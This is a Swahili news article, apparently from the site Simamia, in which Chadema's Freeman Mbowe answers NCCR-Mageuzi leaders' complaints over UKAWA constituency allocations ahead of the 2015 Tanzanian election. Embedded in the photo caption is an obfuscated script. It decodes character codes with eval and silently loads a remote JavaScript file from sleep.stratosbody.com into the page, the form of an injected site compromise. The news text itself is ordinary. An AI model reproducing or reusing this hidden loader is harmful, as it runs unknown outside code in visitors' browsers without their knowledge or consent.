Recent Comments

Mbowe awaumbua Ghati, Nyambabe

By Baraka Bitariho Sep 22, 2015
<p>Mwenyekiti Mwenza wa UKAWA, Freeman Mbowe </p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Mwenyekiti Mwenza wa UKAWA, Freeman Mbowe
Mwenyekiti Mwenza wa UKAWA, Freeman Mbowe

MWENYEKITI Chama cha Demokrasia na Maendeleo (Chadema) ambaye pia ni mwenza wa vyama vinavyounda Umoja wa Katiba ya Wananachi (UKAWA), Freeman Mbowe amesema, wanaoleta chokochoko ndani ya umoja huo walitaka upendeleao. Anaandika Charles William … (endelea).

Kauli ya Mbowe inakuja siku mbili baada ya Makamu Mwenyekiti wa NCCR-Mageuzi, Leticia Ghati Musore na katibu mkuu wa chama hicho Mosena Nyambabe kudai kwamba “Chadema imejipa umiliki wa UKAWA.”

Wakizungumza mbele ya habari viongozi hao wa NCCR-Mageuzi walimtuhumu mwenyekiti wa James Mbatia ‘kutekwa’ na Chadema na kwamba, ameshindwa kukitetea chama chao kwa kile walichosema kumezwa katika umoja huo.

Akizungumza na waandishi leo, Mbowe amesema viongozi hao wana jambo lingine nje ya yale waliyoyatamka hadharani na kwamba, kubwa ni kutaka kupewa upendeleo wa kugombea majimbo licha ya kukosa sifa.

“Tulikubaliana kuwa ili chama kipewe jimbo tutaangalia matokeo ya chama 2010, tutaangalia madiwani wa chama husika katika jimbo, mtandao wa chama pia matokeo ya uchaguzi wa vijiji na mitaa 2014 pamoja na mtandao wa ushindi wa mgombea” amesema Mbowe.

Mbowe mesema majimbo ambayo Nyambabe na Leticia wamekuwa wakiyang’ang’aniwa kugombea licha ya kutokuwa na sifa ni Segerea la jijini Dar es Salaam ambalo walipewa CUF na Jimbo la Serengeti lililopo Mara ambalo limekabidhiwa kwa Chadema.

“Nyambabe alihitaji kugombea Jimbo la Serengeti ambako Chadema ilishinda vijiji 38 lakini NCCR haikushinda hata kijiji kimoja katika uchaguzi wa vijiji, Chadema ina madiwani 8 NCCR haina hata mmoja, Nyambabe amegombea jimbo hilo mara mbili kwa vyama tofauti lakini hakupata hata asilimia 5, tungempaje hapo?” anahoji Mbowe.

Kwa upande wa Musore, Mbowe ameeleza kwamba mwanamama huyo aliomba aachiwe kugombea katika Jimbo la Segerea ambako NCCR haina mtandao wa ushindi wala nguvu “jambo hili UKAWA tulilipinga.”

“Musore tunamfahamu aliwahi kuwa diwani wetu Tarime, hakujijenga wala kujenga NCCR, katika Jimbo la Segerea pia lakini akawa anataka tumzawadie jimbo kama makamu mwenyekiti taifa, hapana! tunataka kushinda hatuwezi kufanya uamuzi tunaojua wananchi wataukataa,” amesema Mbowe.

Hata hivyo amesema UKAWA bado wanaendelea na utatuzi wa migogoro iliyojitokeza katika majimbo na kwamba mambo yatukuwa mazuri muda si mrefu.

“Huu ni muungano wa vyama vinne, lazima kutofautiana kuwepo lakini kamwe hatuwezi kushindwa kuelewana katika maeneo machache yaliyobaki na hivi tunavyoongea Profesa Baregu, Salum Mwalimu, Bashage na viongozi wa CUF taifa wameelekea majimbo yenye shida,” anaarifu Mbowe.

Baadhi ya majimbo yaliyo na utata ni Mtwara Mjini, Kigamboni, Itilima (Simiyu), Masasi, Mtama (Lindi), Ngara na Sikonge

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com